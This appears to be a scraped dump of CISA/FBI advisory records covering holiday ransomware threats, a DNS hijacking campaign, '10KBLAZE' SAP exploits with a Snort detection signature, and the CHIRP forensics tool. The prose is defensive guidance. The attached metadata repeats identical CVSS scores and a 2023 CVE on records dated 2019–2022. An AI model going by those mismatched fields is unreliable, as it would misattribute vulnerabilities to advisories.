against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. 
Cyber criminals, however, may view holidays and weekends\u2014especially holiday weekends\u2014as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.\n\n * In May 2021, leading into Mother\u2019s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim\u2019s network, they deployed ransomware to encrypt victim data and\u2014as a secondary form of extortion\u2014exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.\n * In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.\n * In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations\u2014including multiple managed service providers and their customers.\n\n#### **Ransomware Trends**\n\nThe FBI's Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime\u2014a record number\u2014from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. 
The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020. This number includes only those victims who have provided information to IC3. The following ransomware variants have been the most frequently reported to the FBI in attacks over the last month.\n\n * Conti\n * PYSA\n * LockBit\n * RansomEXX/Defray777\n * Zeppelin\n * Crysis/Dharma/Phobos\n\nThe destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA\u2019s Fact Sheet: [Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches](<https://www.cisa.gov/publication/protecting-sensitive-and-personal-information>).) Malicious actors have also added tactics, such as encrypting or deleting system backups\u2014making restoration and recovery more difficult or infeasible for impacted organizations.\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. 
Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: \n\n * Evaluate a victim\u2019s ability to pay a ransom.\n * Evaluate a victim\u2019s incentive to pay a ransom to: \n * Regain access to their data and/or \n * Avoid having their sensitive or proprietary data publicly leaked.\n * Gather information for follow-on attacks before deploying ransomware on the victim network.\n\n### Threat Hunting\n\nThe FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements: understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. \n\n * **Understand the IT environment\u2019s routine activity and architecture by establishing a baseline.** By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. 
This approach can help an organization stay alert to deviations from normal activity and detect anomalies. Understanding when users log in to the network\u2014and from what location\u2014can assist in identifying anomalies. Understanding the baseline environment\u2014including the normal internal and external traffic\u2014can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.\n * **Review data logs.** Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include: \n * Numerous failed file modifications,\n * Increased CPU and disk activity,\n * Inability to access certain files, and\n * Unusual network communications.\n * **Employ intrusion prevention systems and automated security alerting systems**\u2014such as security information and event management software, intrusion detection systems, and endpoint detection and response.\n * **Deploy honeytokens** and alert on their usage to detect lateral movement.\n\nIndicators of suspicious activity that threat hunters should look for include:\n\n * Unusual inbound and outbound network traffic,\n * Compromise of administrator privileges or escalation of the permissions on an account,\n * Theft of login and password credentials,\n * Substantial increase in database read volume,\n * Geographical irregularities in access and log in patterns,\n * Attempted user activity during anomalous logon times,\n * Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and\n * Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious 
Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>).\n\n#### **Cyber Hygiene Services**\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n### Ransomware Best Practices\n\nThe FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to [CISA](<https://us-cert.cisa.gov/report>), a [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or by [filing a report with IC3](<https://www.ic3.gov/Home/FileComplaint>) at [IC3.gov](<https://www.ic3.gov/>). Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. 
law, and share information to prevent future attacks.\n\n#### **Information Requested**\n\nUpon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: \n\n * Recovered executable file(s),\n * Live memory (RAM) capture,\n * Images of infected systems,\n * Malware samples, and\n * Ransom note.\n\n### Recommended Mitigations\n\nThe FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends. The FBI and CISA highly recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED)\u2014and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/)\u2014for the latest alerts. Additionally, the FBI and CISA recommend identifying IT security employees to be available and \"on call\" during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.\n\n#### **Make an offline backup of your data.**\n\n * Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. 
It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.\n * Review your organization's backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.\n\n#### **Do not click on suspicious links.**\n\n * Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.\n\n#### **If you use RDP\u2014or other potentially risky services\u2014secure and monitor.**\n\n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.\n * Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). \n * Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.\n * Review the security posture of third-party vendors and those interconnected with your organization. 
Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Open document readers in protected viewing modes to help prevent active content from running.\n\n#### **Update your OS and software; scan for vulnerabilities.**\n\n * Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers\u2014as well as software processing internet data, such as web browsers, browser plugins, and document readers\u2014for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.\n * Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.\n * Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA\u2019s free services.)\n\n#### **Use strong passwords.**\n\n * Ensure [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n\n#### **Use multi-factor authentication.**\n\n * Require [multi-factor authentication ](<https://media.defense.gov/2020/Sep/22/2002502665/-1/-1/0/Multifactor_Authentication_Solutions_UOO17091520_V1.1 - Copy.PDF>)(MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 
\n\n#### **Secure your network(s): implement segmentation, filter traffic, and scan ports.**\n\n * Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.\n * Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.\n * Scan network for open and listening ports and close those that are unnecessary.\n * For companies with employees working remotely, secure home networks\u2014including computing, entertainment, and Internet of Things devices\u2014to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. \n\n#### **Secure your user accounts.**\n\n * Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.\n * Regularly audit logs to ensure new accounts are legitimate users.\n\n#### **Have an incident response plan.**\n\n * Create, maintain, and exercise a basic cyber incident response plan that: \n * Includes procedures for response and notification in a ransomware incident and\n * Plans for the possibility of critical systems being inaccessible for a period of time.\n\n**Note:** for help with developing your plan, review available incident response guidance, such as the [Public Power Cyber Incident Response Playbook](<https://www.publicpower.org/system/files/documents/Public-Power-Cyber-Incident-Response-Playbook.pdf>) and the Ransomware Response Checklist in the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### **Use the Ransomware Response Checklist in case of infection.**\n\nIf your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.\n\n * Follow the Ransomware 
Response Checklist on p. 11 of the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n * Scan your backups. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\n### Additional Resources\n\nFor additional resources related to the prevention and mitigation of ransomware, go to [https://www.stopransomware.gov](<https://www.stopransomware.gov/>) as well as the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>). Stopransomware.gov is the U.S. Government\u2019s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:\n\n * CISA Insights: [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://www.cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * CISA: [Cyber Essentials](<https://www.cisa.gov/cyber-essentials>)\n * NIST SP 800-83 Rev. 1: [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>)\n * NIST SP 800-46 Rev. 2: [Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security](<https://csrc.nist.gov/publications/detail/sp/800-46/rev-2/final>)\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### Revisions\n\nAugust 31, 2021: Initial Version|September 2, 2021: Updated mitigations to better align with Ransomware Response Checklist.|February 10, 2022: Updated broken URL\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T12:00:00", "type": "ics", "title": "Ransomware Awareness for Holidays and Weekends", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2022-02-10T12:00:00", "id": "AA21-243A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-243a", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:37:49", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. 
This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-13T12:00:00", "type": 
"ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:36:47", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. 
If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. 
The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\n```\nalert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n```\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to the SAP Message Server.\n * Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode` and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split MS internal/public: `rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to the Message Server internal port (`tcp/39NN`) from clients and the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. 
\n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials ](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists ](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", 
"href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:28:44", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. 
The Alert includes the [CISA-developed Sparrow tool ](<https://github.com/cisagov/Sparrow>)that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. 
**Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### **Compatibility**\n\nCHIRP currently only scans Windows operating systems.\n\n#### **Instructions**\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A Python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. 
For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. 
